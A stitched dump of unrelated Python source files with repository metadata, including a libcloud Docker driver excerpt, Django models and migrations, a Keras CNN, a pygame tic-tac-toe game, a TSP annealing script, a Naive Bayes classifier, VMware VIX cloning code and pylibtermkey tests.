name=path,
path=path,
version=None,
driver=self.connection.driver,
extra={})
return image
def list_images(self):
"""
List the installed container images
:rtype: ``list`` of :class:`libcloud.container.base.ContainerImage`
"""
result = self.connection.request('/v%s/images/json' %
(self.version)).object
images = []
for image in result:
try:
name = image.get('RepoTags')[0]
except:
name = image.get('Id')
images.append(ContainerImage(
id=image.get('Id'),
name=name,
path=name,
version=None,
driver=self.connection.driver,
extra={
"created": image.get('Created'),
"size": image.get('Size'),
"virtual_size": image.get('VirtualSize'),
},
))
return images
def list_containers(self, image=None, all=True):
"""
List the deployed container images
:param image: Filter to containers with a certain image
:type image: :class:`libcloud.container.base.ContainerImage`
:param all: Show all container (including stopped ones)
:type all: ``bool``
:rtype: ``list`` of :class:`libcloud.container.base.Container`
"""
if all:
ex = '?all=1'
else:
ex = ''
try:
result = self.connection.request(
"/v%s/containers/json%s" % (self.version, ex)).object
except Exception as exc:
errno = getattr(exc, 'errno', None)
if errno == 111:
raise DockerException(
errno,
'Make sure docker host is accessible'
'and the API port is correct')
raise
containers = [self._to_container(value) for value in result]
return containers
def deploy_container(self, name, image, parameters=None, start=True,
command=None, hostname=None, user='',
stdin_open=True, tty=True,
mem_limit=0, ports=None, environment=None, dns=None,
volumes=None, volumes_from=None,
network_disabled=False, entrypoint=None,
cpu_shares=None, working_dir='', domainname=None,
memswap_limit=0, port_bindings=None,
network_mode='bridge', labels=None):
"""
Deploy an installed container image
For details on the additional parameters see : http://bit.ly/1PjMVKV
:param name: The name of the new container
:type name: ``str``
:param image: The container image to deploy
:type image: :class:`libcloud.container.base.ContainerImage`
:param parameters: Container Image parameters
:type parameters: ``str``
:param start: Start the container on deployment
:type start: ``bool``
:rtype: :class:`Container`
"""
command = shlex.split(str(command))
if port_bindings is None:
port_bindings = {}
params = {
'name': name
}
payload = {
'Hostname': hostname,
'Domainname': domainname,
'ExposedPorts': ports,
'User': user,
'Tty': tty,
'OpenStdin': stdin_open,
'StdinOnce': False,
'Memory': mem_limit,
'AttachStdin': True,
'AttachStdout': True,
'AttachStderr': True,
'Env': environment,
'Cmd': command,
'Dns': dns,
'Image': image.name,
'Volumes': volumes,
'VolumesFrom': volumes_from,
'NetworkDisabled': network_disabled,
'Entrypoint': entrypoint,
'CpuShares': cpu_shares,
'WorkingDir': working_dir,
'MemorySwap': memswap_limit,
'PublishAllPorts': True,
'PortBindings': port_bindings,
'NetworkMode': network_mode,
'Labels': labels,
}
data = json.dumps(payload)
try:
result = self.connection.request('/v%s/containers/create'
% (self.version),
data=data,
params=params, method='POST')
except Exception as e:
message = e.message or str(e)
if message.startswith('No such image:'):
raise DockerException(None, 'No such image: %s' % image.name)
else:
raise DockerException(None, e)
id_ = result.object['Id']
payload = {
'Binds': [],
'PublishAllPorts': True,
'PortBindings': port_bindings,
}
data = json.dumps(payload)
if start:
result = self.connection.request(
'/v%s/containers/%s/start' %
(self.version, id_), data=data,
method='POST')
return self.get_container(id_)
def get_container(self, id):
"""
Get a container by ID
:param id: The ID of the container to get
:type id: ``str``
:rtype: :class:`libcloud.container.base.Container`
"""
result = self.connection.request("/v%s/containers/%s/json" %
(self.version, id)).object
return self._to_container(result)
def start_container(self, container):
"""
Start a container
:param container: The container to be started
:type container: :class:`libcloud.container.base.Container`
:return: The container refreshed with current data
:rtype: :class:`libcloud.container.base.Container`
"""
payload = {
'Binds': [],
'PublishAllPorts': True,
}
data = json.dumps(payload)
result = self.connection.request(
'/v%s/containers/%s/start' %
(self.version, container.id),
method='POST', data=data)
if result.status in VALID_RESPONSE_CODES:
return self.get_container(container.id)
else:
raise DockerException(result.status,
'failed to start container')
def stop_container(self, container):
"""
Stop a container
:param container: The container to be stopped
:type container: :class:`libcloud.container.base.Container`
:return: The container refreshed with current data
:rtype: :class:`libcloud.container.base.Container`
"""
result = self.connection.request('/v%s/containers/%s/stop' %
(self.version, container.id),
method='POST')
if result.status in VALID_RESPONSE_CODES:
return self.get_container(container.id)
else:
raise DockerException(result.status,
'failed to stop container')
def restart_container(self, container):
"""
Restart a container
:param container: The container to be stopped
:type container: :class:`libcloud.container.base.Container`
:return: The container refreshed with current data
:rtype: :class:`libcloud.container.base.Container`
"""
data = json.dumps({'t': 10})
# number of seconds to wait before killing the container
result = self.connection.request('/v%s/containers/%s/restart' %
(self.version, container.id),
data=data, method='POST')
if result.status in VALID_RESPONSE_CODES:
return self.get_container(container.id)
else:
raise DockerException(result.status,
'failed to restart container')
def destroy_container(self, container):
"""
Remove a container
:param container: The container to be destroyed
:type container: :class:`libcloud.container.base.Container`
:return: True if the destroy was successful, False otherwise.
:rtype: ``bool``
"""
result = self.connection.request('/v%s/containers/%s' % (self.version,
container.id),
method='DELETE')
return result.status in VALID_RESPONSE_CODES
def ex_list_processes(self, container):
"""
List processes running inside a container
:param container: The container to list processes for.
:type container: :class:`libcloud.container.base.Container`
:rtype: ``str``
"""
result = self.connection.request("/v%s/containers/%s/top" %
(self.version, container.id)).object
return result
def ex_rename_container(self, container, name):
"""
Rename a container
:param container: The container to be renamed
:type container: :class:`libcloud.container.base.Container`
:param name: The new name
:type name: ``str``
:rtype: :class:`libcloud.container.base.Container`
"""
result = self.connection.request('/v%s/containers/%s/rename?name=%s'
% (self.version, container.id, name),
method='POST')
if result.status in VALID_RESPONSE_CODES:
return self.get_container(container.id)
def ex_get_logs(self, container, stream=False):
"""
Get container logs
If stream == True, logs will be yielded as a stream
From Api Version 1.11 and above we need a GET request to get the logs
Logs are in different format of those of Version 1.10 and below
:param container: The container to list logs for
:type container: :class:`libcloud.container.base.Container`
:param stream: Stream the output
:type stream: ``bool``
:rtype: ``bool``
"""
payload = {}
data = json.dumps(payload)
if float(self._get_api_version()) > 1.10:
result = self.connection.request(
"/v%s/containers/%s/logs?follow=%s&stdout=1&stderr=1" %
(self.version, container.id, str(stream))).object
logs = result
else:
result = self.connection.request(
"/v%s/containers/%s/attach?logs=1&stream=%s&stdout=1&stderr=1"
% (self.version, container.id, str(stream)),
method='POST',
data=data)
logs = result.body
return logs
def ex_search_images(self, term):
"""Search for an image on Docker.io.
Returns a list of ContainerImage objects
>>> images = conn.ex_search_images(term='mistio')
>>> images
[<ContainerImage: id=rolikeusch/docker-mistio...>,
<ContainerImage: id=mist/mistio, name=mist/mistio,
driver=Docker ...>]
:param term: The search term
:type term: ``str``
:rtype: ``list`` of :class:`libcloud.container.base.ContainerImage`
"""
term = term.replace(' ', '+')
result = self.connection.request('/v%s/images/search?term=%s' %
(self.version, term)).object
images = []
for image in result:
name = image.get('name')
images.append(
ContainerImage(
id=name,
path=name,
version=None,
name=name,
driver=self.connection.driver,
extra={
"description": image.get('description'),
"is_official": image.get('is_official'),
"is_trusted": image.get('is_trusted'),
"star_count": image.get('star_count'),
},
))
return images
def ex_delete_image(self, image):
"""
Remove image from the filesystem
:param image: The image to remove
:type image: :class:`libcloud.container.base.ContainerImage`
:rtype: ``bool``
"""
result = self.connection.request('/v%s/images/%s' % (self.version,
image.name),
method='DELETE')
return result.status in VALID_RESPONSE_CODES
def _to_container(self, data):
"""
Convert container in Container instances
"""
try:
name = data.get('Name').strip('/')
except:
try:
name = data.get('Names')[0].strip('/')
except:
name = data.get('Id')
state = data.get('State')
if isinstance(state, dict):
status = data.get(
'Status',
state.get('Status')
if state is not None else None)
else:
status = data.get('Status')
if 'Exited' in status:
state = ContainerState.STOPPED
elif status.startswith('Up '):
state = ContainerState.RUNNING
else:
state = ContainerState.STOPPED
image = data.get('Image')
ports = data.get('Ports', [])
created = data.get('Created')
if isinstance(created, float):
created = ts_to_str(created)
extra = {
'id': data.get('Id'),
'status': data.get('Status'),
'created': created,
'image': image,
'ports': ports,
'command': data.get('Command'),
'sizerw': data.get('SizeRw'),
'sizerootfs': data.get('SizeRootFs'),
}
ips = []
if ports is not None:
for port in ports:
if port.get('IP') is not None:
ips.append(port.get('IP'))
return Container(
id=data['Id'],
name=name,
image=ContainerImage(
id=data.get('ImageID', None),
path=image,
name=image,
version=None,
driver=self.connection.driver
),
ip_addresses=ips,
state=state,
driver=self.connection.driver,
extra=extra)
def _get_api_version(self):
"""
Get the docker API version information
"""
result = self.connection.request('/version').object
result = result or {}
api_version = result.get('ApiVersion')
return api_version
def ts_to_str(timestamp):
"""
Return a timestamp as a nicely formated datetime string.
"""
date = datetime.datetime.fromtimestamp(timestamp)
date_string = date.strftime("%d/%m/%Y %H:%M %Z")
return date_string
| [
"admin@example.com"
] | admin@example.com |
a6949561c9689c5ddb20528b163889e51ee51477 | fee1f49d0e5187a4974393097d1125fc49e0b28a | /api/category/migrations/0001_initial.py | 82e650ac3786122419420c54ec5a169148727481 | [] | no_license | pratikmishra356/ecomm-backend | 883e00eeb0f065f1c6f20140546a483fd2d76ef3 | 92d4a34805623dd5a14196a2d72713fc15c57a51 | refs/heads/main | 2023-06-11T20:53:45.339834 | 2021-06-30T11:38:36 | 2021-06-30T11:38:36 | 335,620,757 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 696 | py | # Generated by Django 3.0.8 on 2021-01-24 19:11
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema migration: create the ``Category`` model."""
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=50)),
                ('description', models.CharField(max_length=250)),
                # Timestamps maintained automatically by Django on create/update.
                ('created_at', models.DateTimeField(auto_now_add=True)),
                ('updated_at', models.DateTimeField(auto_now=True)),
            ],
        ),
    ]
| [
"pratikmishra@Pratiks-MacBook-Air.local"
] | pratikmishra@Pratiks-MacBook-Air.local |
c7317dcb9c2305e208510d6576bf543713ab6d96 | 6b1de0812ad7ec46e8128c19d43d95d97b5934ba | /InitialModel.py | 4728df0d84e9b2ee926c917e9a6e5ac489fcf985 | [] | no_license | InertFluid/KinshipVerification | 7b8e2ecf33d7b18395a669cad048a990a2c411c6 | 7a2295cdbc0636da7f667e9dcc5cedba639351dc | refs/heads/master | 2020-03-17T13:31:40.004096 | 2019-01-20T12:13:08 | 2019-01-20T12:13:08 | 133,635,276 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,111 | py | from keras.models import Sequential
from keras.layers import Convolution2D
from keras.layers import MaxPooling2D
from keras.layers import Flatten
from keras.layers import Dense
from keras.optimizers import SGD
from keras.initializers import RandomNormal
WTInit = RandomNormal(mean=0.0, stddev=0.01, seed=5)
model=Sequential()
model.add(Convolution2D(16, (5, 5), input_shape=(64, 64, 6), activation="relu", kernel_initializer=WTInit, bias_initializer="zeros"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(64, (5, 5), activation="relu", kernel_initializer=WTInit, bias_initializer="zeros"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Convolution2D(128, (5, 5), activation="relu", kernel_initializer=WTInit, bias_initializer="zeros"))
model.add(Flatten())
model.add(Dense(640, activation="relu", kernel_initializer=WTInit, bias_initializer="zeros"))
model.add(Dense(2, activation="softmax", kernel_initializer=WTInit, bias_initializer="zeros"))
sgd = SGD(lr= 0.01, momentum=0.9, decay=0.005)
model.compile(optimizer=sgd, loss="categorical_crossentropy")
print(model.summary())
| [
"noreply@github.com"
] | InertFluid.noreply@github.com |
1c2e414ee6870262c1e73bf8a1eb3026494988d6 | 7a4ecd59965312425cc9dec10ee09c5d145ea149 | /main.py | 2caf908ced15a5a1454c280fddf78c0bf89e92ac | [] | no_license | j-yeskay/tictactoe-pygame | 192a3fb3f01f55c6f0442b8b7bccf992685a1186 | 3de617405e7b7c9d7a816de17c9a21dd7a999030 | refs/heads/master | 2022-12-05T07:10:35.592225 | 2020-08-28T06:03:45 | 2020-08-28T06:03:45 | 290,964,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,120 | py | import pygame
pygame.init()
#***WINDOW**#
screen = pygame.display.set_mode((420, 625))
pygame.display.set_caption("Tic Tac Toe")
xolist = ["1", "2", "3",
"4", "5", "6",
"7", "8", "9"]
match_status = True
play_count = 0
#***TO AVOID MULTIPLE ATTEMPTS IN ONE BOX***#
b0, b1, b2, b3, b4, b5, b6, b7, b8 = True, True, True, True, True, True, True, True, True
#***FIRST TURN***#
turn = "X"
#***INITIALIZING FONTS***#
turn_font = pygame.font.Font("Manterah.ttf", 100)
topbar_font = pygame.font.Font("Manterah.ttf", 32)
#***BACKEND LOGIC***#
def checkvertical():
if xolist[0] == xolist[3] == xolist[6] == "X"or xolist[1] == xolist[4] == xolist[7] == "X"or xolist[2] == xolist[5] == xolist[8] == "X":
return "x won"
elif xolist[0] == xolist[3] == xolist[6] == "O"or xolist[1] == xolist[4] == xolist[7] == "O"or xolist[2] == xolist[5] == xolist[8] == "O":
return "o won"
def checkhorizontal():
if xolist[0] == xolist[1] == xolist[2] == "X"or xolist[3] == xolist[4] == xolist[5] == "X"or xolist[6] == xolist[7] == xolist[8] == "X":
return "x won"
elif xolist[0] == xolist[1] == xolist[2] == "O"or xolist[3] == xolist[4] == xolist[5] == "O"or xolist[6] == xolist[7] == xolist[8] == "O":
return "o won"
def checkdiagonal():
if xolist[0] == xolist[4] == xolist[8] == "X"or xolist[2] == xolist[4] == xolist[6] == "X":
return "x won"
elif xolist[0] == xolist[4] == xolist[8] == "O"or xolist[2] == xolist[4] == xolist[6] == "O":
return "o won"
def checkwin():
if checkdiagonal() == "x won" or checkhorizontal() == "x won" or checkvertical() == "x won":
global result
global match_status
result = "X HAS WON"
match_status = False
return result
elif checkdiagonal() == "o won" or checkhorizontal() == "o won" or checkvertical() == "o won":
result = "O HAS WON"
match_status = False
return result
def turn_topbar_text():
if match_status == True and play_count != 9:
pygame.draw.rect(screen, (255, 255, 255), (0, 0, 420, 75))
topbar_text = topbar_font.render(
str(turn) + "'s Turn", True, (0, 0, 0))
screen.blit(topbar_text, (150, 20))
elif match_status == False:
pygame.draw.rect(screen, (255, 255, 255), (0, 0, 420, 75))
topbar_text = topbar_font.render(str(result), True, (0, 0, 0))
screen.blit(topbar_text, (150, 20))
else:
pygame.draw.rect(screen, (255, 255, 255), (0, 0, 420, 75))
topbar_text = topbar_font.render("GAME DRAWN", True, (0, 0, 0))
screen.blit(topbar_text, (150, 20))
def button_click(x, y):
global play_count
global turn
play_count += 1
if turn == "X":
x_text = turn_font.render("X", True, (255, 255, 255))
screen.blit(x_text, (x, y))
turn = "O"
else:
y_text = turn_font.render("O", True, (255, 255, 255))
screen.blit(y_text, (x, y))
turn = "X"
running = True
while running:
turn_topbar_text()
#***VERTICAL LINES***#
pygame.draw.line(screen, (255, 255, 255), (147, 100), (147, 598), 1)
pygame.draw.line(screen, (255, 255, 255), (270, 100), (270, 598), 1)
#***HORIZONTAL LINES***#
pygame.draw.line(screen, (255, 255, 255), (25, 266), (395, 266), 1)
pygame.draw.line(screen, (255, 255, 255), (25, 432), (395, 432), 1)
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
mouse_position = pygame.mouse.get_pos()
#***BUTTON EVENTS***#
if 25 + 122 > mouse_position[0] > 25 and 100 + 166 > mouse_position[1] > 100 and b0 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 0
b0 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(60, 150)
checkwin()
if 147 + 123 > mouse_position[0] > 147 and 100 + 166 > mouse_position[1] > 100 and b1 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 1
b1 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(182, 150)
checkwin()
if 270 + 125 > mouse_position[0] > 270 and 100 + 166 > mouse_position[1] > 100 and b2 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 2
b2 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(305, 150)
checkwin()
if 25 + 122 > mouse_position[0] > 25 and 266 + 166 > mouse_position[1] > 266 and b3 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 3
b3 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(60, 316)
checkwin()
if 147 + 123 > mouse_position[0] > 147 and 266 + 166 > mouse_position[1] > 266 and b4 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 4
b4 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(182, 316)
checkwin()
if 270 + 125 > mouse_position[0] > 270 and 266 + 166 > mouse_position[1] > 266 and b5 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 5
b5 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(305, 316)
checkwin()
if 25 + 122 > mouse_position[0] > 25 and 432 + 166 > mouse_position[1] > 432 and b6 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 6
b6 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(60, 482)
checkwin()
if 147 + 123 > mouse_position[0] > 147 and 432 + 166 > mouse_position[1] > 432 and b7 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 7
b7 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(182, 482)
checkwin()
if 270 + 125 > mouse_position[0] > 270 and 432 + 166 > mouse_position[1] > 432 and b8 and match_status:
click = pygame.mouse.get_pressed()
if click[0] == 1:
place = 8
b8 = False
xolist.pop(place)
xolist.insert(place, turn)
button_click(305, 482)
checkwin()
pygame.display.update()
| [
"asksathishk@gmail.com"
] | asksathishk@gmail.com |
8f200f77d978f412dcbeeaade7b38805433e5d9d | 794a85e854fcb0f95f30f3ff9cb7138ae22d2039 | /traveling_salesman_simulated_annealing.py | 82d88cd25ffe8413b743a52565e1c7a74abb0708 | [] | no_license | duweizhuo/Learn_algorithm | 398070c6bd3e5ecccbe3e80d60dd7b8cf39f218d | 28c19f381f3a34ecfce45cdb1dd5ccd43e6f1058 | refs/heads/master | 2020-04-14T13:17:16.111819 | 2019-01-15T14:08:22 | 2019-01-15T14:08:22 | 163,864,485 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,003 | py | import random, numpy, math, copy, matplotlib.pyplot as plt
cities = [[0, 84], [45, 53], [17, 53], [89, 5], [24, 66], [98, 35], [38, 18], [90, 89], [8, 12], [96, 47]]
tour = random.sample(range(10),10)
def dist(city1, city2):
xDist = abs(city1[0] - city2[0])
yDist = abs(city1[1] - city2[1])
distance = math.sqrt(xDist**2 + yDist**2)
return distance
def distChange(tour, new_way):
distanceChange = 0
for k in new_way:
distanceChange += dist(cities[tour[(k+1)%10]], cities[tour[k]])
return distanceChange
for temp in numpy.logspace(0, 5, num = 100000)[::-1]:
[i, j] = sorted(random.sample(range(10), 2))
newTour = copy.deepcopy(tour)
newTour[i], newTour[j] = newTour[j], newTour[i]
P = math.exp((distChange(tour,[j, j-1, i, i-1])) - distChange(newTour, [j, j-1, i, i-1]) / temp)
if P > random.random():
tour = copy.copy(newTour)
plt.plot([cities[tour[i%10]][0] for i in range(11)], [cities[tour[i%10]][1] for i in range(11)], 'xb-')
| [
"noreply@github.com"
] | duweizhuo.noreply@github.com |
c6cb21b34fa419bf4abc0abdd54d3a376f445514 | 8b427ffc8a4c9c538995dce5d21a7d558a82fc8b | /django 家谱管理系统/version2.0-py+js/HomeworkAnswer/firstsite/urls.py | c2d4f6fcd1033beb8e77408fc740a069caaf9611 | [] | no_license | yyhyplxyz/django-and-flask | 73572e565e88d5ac70d4343295b521649a6ccdd8 | 9e763dd9473e70eee8aa96deec09549ae3590a88 | refs/heads/master | 2020-03-26T11:57:52.682150 | 2018-10-09T07:18:58 | 2018-10-09T07:18:58 | 144,868,224 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,384 | py | """firstsite URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.contrib.auth.views import logout
from firstapp.views import index, detail, comment, index_login, index_register, vote,familytree
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^index/', index, name="index"),
url(r'^detail/(?P<id>\d+)/$', detail, name="detail"),
url(r'^comment/(?P<id>\d+)/$', comment, name="comment"),
url(r'^login/$', index_login, name="login"),
url(r'^register/$', index_register, name="register"),
url(r'^logout/', logout, {'next_page': '/index'}, name="logout"),
url(r'^vote/(?P<id>\d+)/$', vote, name="vote"),
url(r'^tree/', familytree, name="tree"),
url(r'^$', index_login, name="login"),
]
| [
"yangyh57@mail2.sysu.edu.cn"
] | yangyh57@mail2.sysu.edu.cn |
21c248c6b320e020a0ffc2d240c18016f8e5cf46 | 16b703f1e62443b9dd3a3e5b4d60859722212f4a | /classify_data.py | 6b51f4eea76d56d93116e99e74d8b1d8ea2e99aa | [] | no_license | haok61bkhn/Intern | a25e8912d437baba98731f57ede2278e39d0393a | 87b99813a28328b807a132d1b1657f71d545ff10 | refs/heads/master | 2020-04-26T07:46:00.469425 | 2019-03-04T09:18:51 | 2019-03-04T09:18:51 | 173,403,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,377 | py | import re
from sklearn.metrics import accuracy_score
data=[] # moi phan tu la từ và số lượng từ
lam=[] # mỗi phần tử là từ trong data và lamda của nó trong 1 label
sizelam=0;
def readFile(path): # doc file tra ve xau
f=open(path,"r",encoding="utf-8")
s=f.read().split("\n")
s.pop()
return (s)
def prepare(s): # tien xu li mang xau
for i in range(0,len(s)):
s[i] = re.sub("%|:|'|@|#|\$|\,|\"|\(|\)|&|\*|Nguồn.*|[0-9]|\/|\.|\“|’|;| - |\]|\[|\?" , '',s[i])
s[i] = re.sub("[\t]| | | - ", " ",s[i])
def Prepare_Data(): # tien xu li data
for i in range(1,14):
data.append([])
s=readFile("classify_data/train/"+str(i)+ ".txt")
prepare(s)
for j in range(0,len(s)):
data[i-1]+=s[j].split(" ")
def Cal_lamda(): # tao vecto va tinh lamda
dx={}
for i in range(0,13):
dx.update(dict.fromkeys(data[i],0))
sizelam=len(dx)
for i in range(0,13):
lam.append([])
lam[i]=dx.copy()
for x in data[i]:
lam[i][x]+=1
for i in range(0,13):
sizedata=len(data[i])
sums=sizedata+sizelam
for x in lam[i]:
lam[i][x]=(lam[i][x]+1)/sums
def Check(s): # tien xu li xau s va du doan label s
import math
s=s.split(" ")
lams={}
lams=dict.fromkeys(s,0)
for x in s:
lams[x]+=1
res=-100000
label=0
for i in range(0,13):
su=0.0
count=0
for x in lams:
if (x in lam[i]) and (len(x)>=3):
su+=lams[x]*math.log10(2*lam[i][x])
if res<su :
res=su
label=i+1
return label
if __name__ == "__main__":
Prepare_Data()
Cal_lamda()
s=readFile("classify_data/test/data.txt")
prepare(s)
f=open("res.txt","w+",encoding="utf-8")
res=[] # mảng dự đooán label của test
for x in s:
z=Check(x)
f.writelines(str(z)+"\n")
res.append(str(z))
res_main=readFile("classify_data/test/label.txt") # mảng kết của đúng của test
print(accuracy_score(res_main,res))
| [
"noreply@github.com"
] | haok61bkhn.noreply@github.com |
4867b3ebc46846cb74560c531ceda687963f68d3 | 3b73266191d85023ced56fa553dccd3ae447e7eb | /photobook/models.py | 9908c7fe4c3d635770b213684547d3934a1f4e48 | [] | no_license | shindle69/photowall-1 | ab28b2f9ec8f18b892b192c8cf714693848dc8ce | d5ef5199ea6593e878fbf31f90f6202d644a9c5d | refs/heads/master | 2020-03-21T17:46:11.845342 | 2017-05-18T15:25:44 | 2017-05-18T15:25:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 760 | py | from django.db import models
# Create your models here.
class TimeStamp(models.Model):
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
class Post(TimeStamp):
title = models.CharField(max_length=100,default=None)
category= models.CharField(max_length=100,
choices = (
('글로벌 챌린지','글로벌 챌린지' ),
('은지', '은지'),
('바르셀로나mwc', '바르셀로나mwc'),
('인도네시아 코이카 탐방','인도네시아 코이카 탐방'),
),default=False)
story = models.CharField(max_length=200)
photo = models.ImageField(upload_to='blog/%Y/%M/%D')
def __str__(self):
return self.title | [
"qoentlr37@naver.com"
] | qoentlr37@naver.com |
869f438354c88e21bb4f03b3facb118be4743654 | 8cc083b3407789e8c95f38c95aea9c48ce0e770f | /hellopy/experiment.py | 8a2df87516cf3bd6aadb4e5ab6025d546c80449a | [] | no_license | andrewdotn/vixpy | b15088f66a4fb38e510f1e93836d24f6291a835b | 34267f34ac65a72f1064c2aa25caf78e83c94ce6 | refs/heads/main | 2021-12-02T19:45:08.839788 | 2015-11-27T05:18:23 | 2015-11-27T05:18:23 | 47,004,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,228 | py | import os.path
import time
from threading import Thread
START_TIME = time.time()
from vix import VixHost, VixVm
with VixHost() as h:
vmx_path = os.path.expanduser(
"~/Virtual Machines.localized/vixpy-base.vmwarevm/vixpy-base.vmx")
with VixVm(h, vmx_path) as base_vm:
def do_stuff(i):
def func():
clone_path = os.path.expanduser(
"~/Virtual Machines.localized/vixpy-clone%d.vmwarevm/vixpy-clone%d.vmx" % (i, i))
base_vm.clone(clone_path)
with VixVm(h, clone_path) as child:
try:
child.power_on()
child.wait_for_tools()
guest = child.login('root', 'test')
print(guest.run_command("ip link"))
finally:
child.power_off()
child.delete()
return func
threads = []
for i in range(0, 5):
threads.append(Thread(target=do_stuff(i)))
for t in threads:
t.start()
for t in threads:
t.join()
END_TIME = time.time()
print("%.3fs elapsed" % (END_TIME - START_TIME))
| [
"andrew@neitsch.ca"
] | andrew@neitsch.ca |
604bb489b26480db07be751687fcf914423a2cae | fc91ef90d128a34cb928408a109f6a2dd6d727f8 | /python/pylibtermkey/test_pylibtermkey.py | 8bcd051b5a8c339ac6de0ac3ee4e90defb0eae17 | [
"BSD-3-Clause",
"MIT"
] | permissive | mvilim/pylibtermkey | 0629875f2363cd73bcefba8eedc55b9018cf4d7c | 39e7cd562deb4ed91798d5e26189bd6760c0489f | refs/heads/master | 2021-06-28T06:20:02.507807 | 2020-10-09T06:41:31 | 2020-10-09T06:41:31 | 167,847,282 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,928 | py | # Copyright (c) 2019 Michael Vilim
#
# This file is part of the pylibtermkey library. It is currently hosted at
# https://github.com/mvilim/pylibtermkey
#
# pylibtermkey is licensed under the MIT license. A copy of the license can be
# found in the root folder of the project.
import abc
import unittest
from unittest import TestCase
import warnings
try:
import curses
curses.setupterm()
bs_str = '<Backspace>'
if curses.tigetstr('kbs') == bytes.fromhex('7F'):
del_str = bs_str
else:
del_str = '<DEL>'
has_curses = True
except:
has_curses = False
try:
from pynput.keyboard import Key, Controller
def suppress_deprecation(action):
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=DeprecationWarning)
action()
has_pynput = True
except:
has_pynput = False
import pylibtermkey as termkey
class Keys:
CTRL = 1
DEL = 2
ESC = 3
class TermKeyTests(abc.ABC):
def setUp(self):
self.tk = termkey.TermKey()
def tearDown(self):
self.tk.stop()
class NonInputTests(TermKeyTests, TestCase):
def test_new_flags(self):
new_flags = {termkey.TermKeyFlag.CTRLC}
self.tk.set_flags(new_flags)
self.assertSetEqual(self.tk.get_flags(), new_flags)
def test_wait(self):
default_time = 50
new_time = 25
self.assertEqual(self.tk.get_waittime(), default_time)
self.tk.set_waittime(new_time)
self.assertEqual(self.tk.get_waittime(), new_time)
def test_new_canonflags(self):
new_canonflags = {termkey.TermKeyCanon.DELBS}
self.tk.set_canonflags(new_canonflags)
self.assertSetEqual(self.tk.get_canonflags(), new_canonflags)
class InputTests(TermKeyTests, abc.ABC):
@abc.abstractmethod
def tap(self, key):
pass
@abc.abstractmethod
def modify_tap(self, key, modifier):
pass
def test_wait_simple_letter(self):
letter = 'j'
self.tap(letter)
res, key = self.tk.waitkey()
self.assertEqual(res, termkey.TermKeyResult.KEY)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), letter)
def test_get(self):
letter = 'j'
self.tap(letter)
res, key = self.tk.getkey()
self.assertEqual(res, termkey.TermKeyResult.KEY)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), letter)
def test_force_get(self):
self.tap(Keys.ESC)
res, key = self.tk.getkey()
self.assertEqual(res, termkey.TermKeyResult.AGAIN)
res, key = self.tk.getkey_force()
self.assertEqual(res, termkey.TermKeyResult.KEY)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), '<Escape>')
def test_ctrlc_flag(self):
self.tk.set_flags({termkey.TermKeyFlag.CTRLC})
# restart termkey to pick up the new interrupt behavior
self.tk.stop()
self.tk.start()
self.modify_tap('c', Keys.CTRL)
res, key = self.tk.waitkey()
self.assertEqual(res, termkey.TermKeyResult.KEY)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), '<C-c>')
@unittest.skipUnless(has_curses, "Requires curses to query terminfo DEL mapping")
def test_canonicalize(self):
self.tap(Keys.DEL)
res, key = self.tk.waitkey()
self.assertEqual(res, termkey.TermKeyResult.KEY)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), del_str)
self.tk.set_canonflags({termkey.TermKeyCanon.DELBS})
self.tk.canonicalise(key)
self.assertEqual(self.tk.strfkey(key, termkey.TermKeyFormat.VIM), bs_str)
def test_key_symbol(self):
self.tap(Keys.ESC)
res, key = self.tk.getkey_force()
self.assertEqual(res, termkey.TermKeyResult.KEY)
